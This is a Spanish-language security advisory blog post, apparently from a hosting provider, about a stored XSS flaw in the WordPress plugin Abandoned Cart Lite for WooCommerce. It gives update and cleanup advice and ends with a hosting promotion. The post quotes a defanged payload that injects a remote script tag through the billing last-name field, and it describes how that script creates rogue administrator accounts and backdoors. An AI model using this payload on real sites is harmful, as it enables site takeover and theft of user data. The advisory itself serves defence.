Portada Wordpress Plugin WordPress Hackeado – Abandoned Cart Lite for WooCommerce
Se ha detectado una vulnerabilidad importante en el plugin para WordPress Abandoned Cart Lite for WooCommerce.
Si estás usando este plugin, es imperativo que actualices a la versión 5.2.0 del plugin o superior y revises WordPress en busca de contenido malicioso.
De no hacerlo, un atacante podría hacerse con el control del sitio web y realizar la acción que desee hacer, envíos de spam, añadir código malicioso para substraer datos de los usuarios, software par minar criptomonedas, etc…
El plugin Abandoned Cart Lite for WooCommerce es un plugin pensado para recuperar las ventas que se quedan a medias en WooCommerce.
Si un cliente deja un producto en el carrito de compra sin finalizar el proceso de pago, avisa al administrador de sitio para que intente recuperar la venta.
Este tipo de plugins son muy populares pues son muy efectivos para aumentar el número de ventas de cualquier comercio online.
Si estás acostumbrado a realizar compras por Internet y alguna vez has dejado un producto en el carrito de tu cuenta de Amazon o similar, seguramente habrás recibido algún email recordándote que tienes dicho producto en el carrito.
Los atacantes encontraron una vulnerabilidad en el plugin Abandoned Cart Lite for WooCommercepara poder atacar el sitio inyectado una carga maliciosa de JavaScript
Una vez descubierta la vulnerabilidad el proceso no es complicado.
Los atacante simplemente tenían que realizar el proceso de compra y dejar el carrito abandonado.
Con nombre y correo electrónico falsos, no importa, pero en el campo de Apellidos (billing_last_name) añaden un carga útil con el script inyectado del tipo:
<script src=hXXps://bit[.]ly/xxxxxxx></script>
Este script de destino es el encargado de ejecutar el contenido malicioso utilizando la propia sesión abierta por el administrador, que está revisando el carrito abandonado, para añadir las puertas traseras en el propio sitio web.
Se han detectados dos acciones maliciosas. Una es crear una cuenta de administrador no autorizada y la otra buscar un plugin que tengamos desactivado para instalar en él un script de ejecución de código.
Si el ataque tiene éxito, el mismo script se encarga de avisar al atacante para que puede empezar a realizar sus acciones maliciosas.
Como habrás visto, el ataque usa el popular acortador de URL’s bit.ly, lo que le garantiza cierto anonimato y seguir teniendo acceso al sitio editando el enlace acortado si el dominio atacante es desactivado. Sencillo pero efectivo.
Si eres uno de los usuarios del plugin Abandoned Cart Lite lo primero que tienes que hacer es actualizarlo a la última versión que exista disponible.
Por desgracia, el parche añadido por el desarrollador del plugin no puede eliminar los usuarios creados, ni es capaz de cerrar las puertas traseras que el ataque haya podido crear.
Si crees que has podido ser objeto de un ataque deberás de revisar dos cosas:
1- Revisar la base de datos en busca de cualquier código inyectado. La principal tabla es: ‘’ac_guest_abandoned_cart_history
2- Revisar los usuarios con el roll de administrador de WordPress. Si hay alguno que no reconozcas, elimínalo sin contemplaciones.
Después de esto puedes pasar pasar el antivirus que tienes disponible en cPanel, pero ten en cuenta que solo podrá detectar código malicioso instalado.
Si hay una puerta trasera, no la detectará, solo el código que se pueda inyectar a través de ella.
La vulnerabilidad usa el XSS de WordPress y la mayoría de los plugins de de seguridad de WordPress, bloquean los ataques XSS.
Así que si tenéis instalado algunos de estos plugins como Wordfence, BBQ:Block Bad Queries, BulletProof Security, etc… posiblemente haya podido evitar el ataque.
Si no tienes ningún plugin instalado prueba a instalar alguno y hacer un escanear WordPress, pero recuerda que la revisión de la base de datos y usuarios debes hacerla tú o dejarlo en manos de un profesional para estar totalmente seguros.
En todos los hosting WordPress que ofrecemos en Hostinet, tenemos un sistema de protección de Malware.
No podemos evitar que un ataque como el que hemos comentado hoy, acabe inyectando malware en tu WordPress, pero si podemos detectarlo y aislarlo.
Después avisamos al cliente para que pueda tomar las acciones pertinentes y solucionar el problema lo antes posible.
Así que si eres cliente de Hostinet, tienes esta capa de seguridad extra de la que nos encargamos nosotros.